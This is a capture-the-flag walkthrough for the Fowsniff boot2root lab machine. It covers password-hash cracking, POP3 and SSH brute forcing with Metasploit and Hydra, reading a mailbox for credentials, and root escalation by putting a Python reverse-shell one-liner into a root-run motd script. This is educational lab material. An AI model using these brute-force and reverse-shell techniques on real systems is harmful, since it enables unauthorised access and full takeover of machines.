From aldeid
Jump to navigation Jump to search

Fowsniff CTF

Hack this machine and get the flag. There are lots of hints along the way and is perfect for beginners!

This boot2root machine is brilliant for new starters. You will have to enumerate this machine by finding open ports, do some online research (its amazing how much information Google can find for you), decoding hashes, brute forcing a pop3 login and much more!

This will be structured to go through what you need to do, step by step. Make sure you are connected to our network

Credit to berzerk0 for creating this machine. This machine is used here with the explicit permission of the creator <3.

#2 - Using nmap, scan this machine. What ports are open?

Hint: nmap -A -p- -sV

Nmap discovers 4 open ports:

[email protected]:/data/Fowsniff_CTF$ nmap -Pn -sC -sV -A
Starting Nmap 7.80 ( ) at 2020-09-03 17:53 CEST
Nmap scan report for
Host is up (0.044s latency).
Not shown: 996 closed ports
22/tcp  open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 90:35:66:f4:c6:d2:95:12:1b:e8:cd:de:aa:4e:03:23 (RSA)
|   256 53:9d:23:67:34:cf:0a:d5:5a:9a:11:74:bd:fd:de:71 (ECDSA)
|_  256 a2:8f:db:ae:9e:3d:c9:e6:a9:ca:03:b1:d7:1b:66:83 (ED25519)
80/tcp  open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Fowsniff Corp - Delivering Solutions
110/tcp open  pop3    Dovecot pop3d
143/tcp open  imap    Dovecot imapd
|_imap-capabilities: Pre-login LOGIN-REFERRALS ID ENABLE SASL-IR more have LITERAL+ post-login capabilities IMAP4rev1 listed OK AUTH=PLAINA0001 IDLE
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 21.43 seconds

#3 - Using the information from the open ports. Look around. What can you find?

Connecting to the web server reveals that the company has been attacked:

Fowsniff's internal system suffered a data breach that resulted in the exposure of employee usernames and passwords.

Client information was not affected.

Due to the strong possibility that employee information has been made publicly available, all employees have been instructed to change their passwords immediately.

The attackers were also able to hijack our official @fowsniffcorp Twitter account. All of our official tweets have been deleted and the attackers may release sensitive information via this medium. We are working to resolve this at soon as possible.

We will return to full capacity after a service upgrade.

Searching for the Twitter account (@fowsniffcorp) refered to in the message leads to where we can find a tweet with a link to

Below is the content on Pastebin:

           ( o o )
|                            |
|          FOWSNIFF          |
|            got             |
|           PWN3D!!!         |
|                            |         
|       .oooO                |         
|        (   )   Oooo.       |         
+---------\ (----(   )-------+
           \_)    ) /
FowSniff Corp got pwn3d by B1gN1nj4!
No one is safe from my 1337 skillz!

[email protected]:8a28a94a588a95b80163709ab4313aa4
[email protected]:ae1644dac5b77c0cf51e0d26ad6d7e56
[email protected]:1dc352435fecca338acfd4be10984009
[email protected]:19f5af754c31f1e2651edde9250d69bb
[email protected]:90dc16d47114aa13671c697fd506cf26
[email protected]:a92b8a29ef1183192e3d35187e0cfabd
[email protected]:0e9588cb62f4b6f27e33d449e2ba0b3b
[email protected]:4d6e42f56e127803285a0a7649b5ab11
[email protected]:f7fd98d380735e859f8b2ffbbede5a7e

Fowsniff Corporation Passwords LEAKED!

Here are their email passwords dumped from their databases.
They left their pop3 server WIDE OPEN, too!

MD5 is insecure, so you shouldn't have trouble cracking them but I was too lazy haha =P

l8r n00bz!


This list is entirely fictional and is part of a Capture the Flag educational challenge.

All information contained within is invented solely for this purpose and does not correspond
to any real persons or organizations.

Any similarities to actual people or entities is purely coincidental and occurred accidentally.

#4 - Using Google, can you find any public information about them?

Hint: There is a pastebin with all of the company employees emails and hashes.

The content discloses email addresses and password hashes.

[email protected]:8a28a94a588a95b80163709ab4313aa4
[email protected]:ae1644dac5b77c0cf51e0d26ad6d7e56
[email protected]:1dc352435fecca338acfd4be10984009
[email protected]:19f5af754c31f1e2651edde9250d69bb
[email protected]:90dc16d47114aa13671c697fd506cf26
[email protected]:a92b8a29ef1183192e3d35187e0cfabd
[email protected]:0e9588cb62f4b6f27e33d449e2ba0b3b
[email protected]:4d6e42f56e127803285a0a7649b5ab11
[email protected]:f7fd98d380735e859f8b2ffbbede5a7e

#5 - Can you decode these md5 hashes? You can even use sites like hashkiller to decode them.

Using, we can retrieve 8 passwords out of 9:

Email MD5 hash password
[email protected] 8a28a94a588a95b80163709ab4313aa4 mailcall
[email protected] ae1644dac5b77c0cf51e0d26ad6d7e56 bilbo101
[email protected] 1dc352435fecca338acfd4be10984009 apples01
[email protected] 19f5af754c31f1e2651edde9250d69bb skyler22
[email protected] 90dc16d47114aa13671c697fd506cf26 scoobydoo2
[email protected] a92b8a29ef1183192e3d35187e0cfabd -
[email protected] 0e9588cb62f4b6f27e33d449e2ba0b3b carp4ever
[email protected] 4d6e42f56e127803285a0a7649b5ab11 orlando12
[email protected] f7fd98d380735e859f8b2ffbbede5a7e 07011972

#6 - Using the usernames and passwords you captured, can you use metasploit to brute force the pop3 login?

Hint: In metasploit there is a packages called: auxiliary/scanner/pop3/pop3_login where you can enter all the usernames and passwords you found to brute force this machines pop3 service.

We can use Metasploit’s pop3_login module to brute force the POP3 service using the credentials found previously.

[email protected]:/data/Fowsniff_CTF/files$ msfconsole -q
[*] Starting persistent handler(s)...
msf5 > use auxiliary/scanner/pop3/pop3_login 
msf5 auxiliary(scanner/pop3/pop3_login) > show options

Module options (auxiliary/scanner/pop3/pop3_login):

   Name              Current Setting                                                    Required  Description
   ----              ---------------                                                    --------  -----------
   BLANK_PASSWORDS   false                                                              no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                  yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                                              no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                              no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                              no        Add all users in the current database to the list
   PASSWORD                                                                             no        A specific password to authenticate with
   PASS_FILE         /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt  no        The file that contains a list of probable passwords.
   RHOSTS                                                                               yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             110                                                                yes       The target port (TCP)
   STOP_ON_SUCCESS   false                                                              yes       Stop guessing when a credential works for a host
   THREADS           1                                                                  yes       The number of concurrent threads (max one per host)
   USERNAME                                                                             no        A specific username to authenticate as
   USERPASS_FILE                                                                        no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                                                              no        Try the username as the password for all users
   USER_FILE         /usr/share/metasploit-framework/data/wordlists/unix_users.txt      no        The file that contains a list of probable users accounts.
   VERBOSE           true                                                               yes       Whether to print output for all attempts

msf5 auxiliary(scanner/pop3/pop3_login) > set rhost
rhost =>
msf5 auxiliary(scanner/pop3/pop3_login) > set user_file /data/Fowsniff_CTF/files/usernames.txt
user_file => /data/Fowsniff_CTF/files/usernames.txt
msf5 auxiliary(scanner/pop3/pop3_login) > set pass_file /data/Fowsniff_CTF/files/passwords.txt
pass_file => /data/Fowsniff_CTF/files/passwords.txt
msf5 auxiliary(scanner/pop3/pop3_login) > run

[-]      - - Failed: 'mauer:mailcall', '-ERR [AUTH] Authentication failed.'
[!]      - No active DB -- Credential data will not be saved!
[-]      - - Failed: 'mauer:bilbo101', '-ERR [AUTH] Authentication failed.'
[-]      - - Failed: 'mauer:apples01', '-ERR [AUTH] Authentication failed.'
[-]      - - Failed: 'mauer:skyler22', ''
[-]      - - Failed: 'mauer:scoobydoo2', ''
[-]      - - Failed: 'mauer:carp4ever', ''
[-]      - - Failed: 'mauer:orlando12', ''
[-]      - - Failed: 'mauer:07011972', ''
[-]      - - Failed: 'mustikka:mailcall', ''
[-]      - - Failed: 'mustikka:bilbo101', ''
[-]      - - Failed: 'mustikka:apples01', ''
[-]      - - Failed: 'mustikka:skyler22', ''
[-]      - - Failed: 'mustikka:scoobydoo2', ''
[-]      - - Failed: 'mustikka:carp4ever', ''
[-]      - - Failed: 'mustikka:orlando12', ''
[-]      - - Failed: 'mustikka:07011972', ''
[-]      - - Failed: 'tegel:mailcall', ''
[-]      - - Failed: 'tegel:bilbo101', ''
[-]      - - Failed: 'tegel:apples01', ''
[-]      - - Failed: 'tegel:skyler22', ''
[-]      - - Failed: 'tegel:scoobydoo2', ''
[-]      - - Failed: 'tegel:carp4ever', ''
[-]      - - Failed: 'tegel:orlando12', ''
[-]      - - Failed: 'tegel:07011972', ''
[-]      - - Failed: 'baksteen:mailcall', ''
[-]      - - Failed: 'baksteen:bilbo101', ''
[-]      - - Failed: 'baksteen:apples01', ''
[-]      - - Failed: 'baksteen:skyler22', ''
[-]      - - Failed: 'baksteen:scoobydoo2', ''
[-]      - - Failed: 'baksteen:carp4ever', ''
[-]      - - Failed: 'baksteen:orlando12', ''
[-]      - - Failed: 'baksteen:07011972', ''
[-]      - - Failed: 'seina:mailcall', ''
[-]      - - Failed: 'seina:bilbo101', ''
[-]      - - Failed: 'seina:apples01', ''
[-]      - - Failed: 'seina:skyler22', ''
[+]      - - Success: 'seina:scoobydoo2' '+OK Logged in.  '
[-]      - - Failed: 'stone:mailcall', '-ERR [AUTH] Authentication failed.'
[-]      - - Failed: 'stone:bilbo101', '-ERR [AUTH] Authentication failed.'
[-]      - - Failed: 'stone:apples01', '-ERR [AUTH] Authentication failed.'
[-]      - - Failed: 'stone:skyler22', ''

However, Hydra is faster:

[email protected]:/data/Fowsniff_CTF/files$ hydra -L usernames.txt -P passwords.txt pop3://
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra ( starting at 2020-09-03 19:05:30
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 72 login tries (l:9/p:8), ~5 tries per task
[DATA] attacking pop3://
[110][pop3] host:   login: seina   password: scoobydoo2
1 of 1 target successfully completed, 1 valid password found
Hydra ( finished at 2020-09-03 19:06:24

We confirm that 1 account is still valid: seina:scoobydoo2

#7 - What was seina’s password to the email service?

Answer: scoobydoo2

#8 - Can you connect to the pop3 service with her credentials? What email information can you gather?

Hint: Use netcat with the port 110 to view her emails. nc <ip> 110

Let’s connect to the POP3 service. We successfully connect as seina and find 2 emails.

$ telnet 110
Connected to
Escape character is '^]'.
+OK Welcome to the Fowsniff Corporate Mail Server!
user seina
pass scoobydoo2
+OK Logged in.
+OK 2 messages:
1 1622
2 1280

First email:

retr 1
+OK 1622 octets
Return-Path: <[email protected]>
X-Original-To: [email protected]
Delivered-To: [email protected]
Received: by fowsniff (Postfix, from userid 1000)
    id 0FA3916A; Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
To: [email protected], [email protected], [email protected],
    [email protected], [email protected], [email protected], [email protected],
    [email protected]
Subject: URGENT! Security EVENT!
Message-Id: <[email protected]>
Date: Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
From: [email protected] (stone)

Dear All,

A few days ago, a malicious actor was able to gain entry to
our internal email systems. The attacker was able to exploit
incorrectly filtered escape characters within our SQL database
to access our login credentials. Both the SQL and authentication
system used legacy methods that had not been updated in some time.

We have been instructed to perform a complete internal system
overhaul. While the main systems are "in the shop," we have
moved to this isolated, temporary server that has minimal

This server is capable of sending and receiving emails, but only
locally. That means you can only send emails to other users, not
to the world wide web. You can, however, access this system via 
the SSH protocol.

The temporary password for SSH is "S1ck3nBluff+secureshell"

You MUST change this password as soon as possible, and you will do so under my
guidance. I saw the leak the attacker posted online, and I must say that your
passwords were not very secure.

Come see me in my office at your earliest convenience and we'll set it up.

A.J Stone


Second email:

retr 2
+OK 1280 octets
Return-Path: <[email protected]>
X-Original-To: [email protected]
Delivered-To: [email protected]
Received: by fowsniff (Postfix, from userid 1004)
    id 101CA1AC2; Tue, 13 Mar 2018 14:54:05 -0400 (EDT)
To: [email protected]
Subject: You missed out!
Message-Id: <[email protected]>
Date: Tue, 13 Mar 2018 14:54:05 -0400 (EDT)
From: [email protected]


You should have seen the brass lay into AJ today!
We are going to be talking about this one for a looooong time hahaha.
Who knew the regional manager had been in the navy? She was swearing like a sailor!

I don't know what kind of pneumonia or something you brought back with
you from your camping trip, but I think I'm coming down with it myself.
How long have you been gone - a week?
Next time you're going to get sick and miss the managerial blowout of the century,
at least keep it to yourself!

I'm going to head home early and eat some chicken soup. 
I think I just got an email from Stone, too, but it's probably just some
"Let me explain the tone of my meeting with management" face-saving mail.
I'll read it when I get back.

Feel better,


PS: Make sure you change your email password. 
AJ had been telling us to do that right before Captain Profanity showed up.


#9 - Looking through her emails, what was a temporary password set for her?

Answer: S1ck3nBluff+secureshell

#10 - In the email, who send it? Using the password from the previous question and the senders username, connect to the machine using SSH.

Extracting the list of recipients of the email, we can use hydra to confirm what user has not changed the password:

[email protected]:/data/Fowsniff_CTF/files$ hydra -L sshusers.txt -p S1ck3nBluff+secureshell ssh://
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra ( starting at 2020-09-03 20:14:43
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 8 tasks per 1 server, overall 8 tasks, 8 login tries (l:8/p:1), ~1 try per task
[DATA] attacking ssh://
[22][ssh] host:   login: baksteen   password: S1ck3nBluff+secureshell
1 of 1 target successfully completed, 1 valid password found
Hydra ( finished at 2020-09-03 20:14:47

We can now connect as baksteen against the SSH service:

$ ssh [email protected]

#11 - Once connected, what groups does this user belong to? Are there any interesting files that can be run by that group?


Baksteen belongs to the users group. Listing the files owned by this group reveals an interesting file (a shell script):

[email protected]:~$ id
uid=1004(baksteen) gid=100(users) groups=100(users),1001(baksteen)
[email protected]:~$ find / -type f -group users 2>/dev/null

The script /opt/cube/ is interesting because it displays the banner that is displayed when we connect to the SSH service. Besides, we can modify it.

[email protected]:/data/Fowsniff_CTF/files$ ssh [email protected]
[email protected]'s password: 

                            _____                       _  __  __  
      :sdddddddddddddddy+  |  ___|____      _____ _ __ (_)/ _|/ _|  
   :yNMMMMMMMMMMMMMNmhsso  | |_ / _ \ \ /\ / / __| '_ \| | |_| |_   
.sdmmmmmNmmmmmmmNdyssssso  |  _| (_) \ V  V /\__ \ | | | |  _|  _|  
-:      y.      dssssssso  |_|  \___/ \_/\_/ |___/_| |_|_|_| |_|   
-:      y.      dssssssso                ____                      
-:      y.      dssssssso               / ___|___  _ __ _ __        
-:      y.      dssssssso              | |   / _ \| '__| '_ \     
-:      o.      dssssssso              | |__| (_) | |  | |_) |  _  
-:      o.      yssssssso               \____\___/|_|  | .__/  (_) 
-:    .+mdddddddmyyyyyhy:                              |_|        
-: -odMMMMMMMMMMmhhdy/.    
.ohdddddddddddddho:                  Delivering Solutions

   ****  Welcome to the Fowsniff Corporate Server! **** 

              ---------- NOTICE: ----------

 * Due to the recent security breach, we are running on a very minimal system.
 * Contact AJ Stone -IMMEDIATELY- about changing your email and SSH passwords.

Last login: Tue Mar 13 16:55:40 2018 from

This means that we can replace its content with a reverse shell.

#12 - Now you have found a file that can be edited by the group, can you edit it to include a reverse shell?

We can get a python reverse shell from pentestmonkey. Let’s replace the content of /opt/cube/ with this code:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'


If you have not found out already, this file is run as root when a user connects to the machine using SSH. We know this as when we first connect we can see we get given a banner (with fowsniff corp). Look in /etc/update-motd.d/ file. If (after we have put our reverse shell in the cube file) we then include this file in the motd.d file, it will run as root and we will get a reverse shell as root!

Hint: Run the cube file to the motd.d file.

We can confirm that the /opt/cube/ script is present in /etc/update-motd.d/00-header. The motd (Message of the Day) daemon is responsible for displaying a message on an SSH connection and it is executed by root.

[email protected]:/etc/update-motd.d$ grep cube *
00-header:sh /opt/cube/

#14 - Start a netcat listener (nc -lvp 1234) and then re-login to the SSH service. You will then receive a reverse shell on your netcat session as root!

Let’s disconnect from our SSH session, and open a listener (adapt the port to fit with the one mentioned in the reverse shell):

$ rlwrap nc -nlvp 4444

Now, when we reconnect with SSH, we have a root shell in listener window:

[email protected]:/data/Fowsniff_CTF/files$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 38714
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls -la
total 28
drwx------  4 root root 4096 Mar  9  2018 .
drwxr-xr-x 22 root root 4096 Mar  9  2018 ..
-rw-r--r--  1 root root 3117 Mar  9  2018 .bashrc
drwxr-xr-x  2 root root 4096 Mar  9  2018 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  5 root root 4096 Mar  9  2018 Maildir
-rw-r--r--  1 root root  582 Mar  9  2018 flag.txt
# cat flag.txt
   ___                        _        _      _   _             _ 
  / __|___ _ _  __ _ _ _ __ _| |_ _  _| |__ _| |_(_)___ _ _  __| |
 | (__/ _ \ ' \/ _` | '_/ _` |  _| || | / _` |  _| / _ \ ' \(_-<_|
  \___\___/_||_\__, |_| \__,_|\__|\_,_|_\__,_|\__|_\___/_||_/__(_)

  |    R O O T   |
  |    F L A G   |

Nice work!

This CTF was built with love in every byte by @berzerk0 on Twitter.

Special thanks to psf, @nbulischeck and the whole Fofao Team.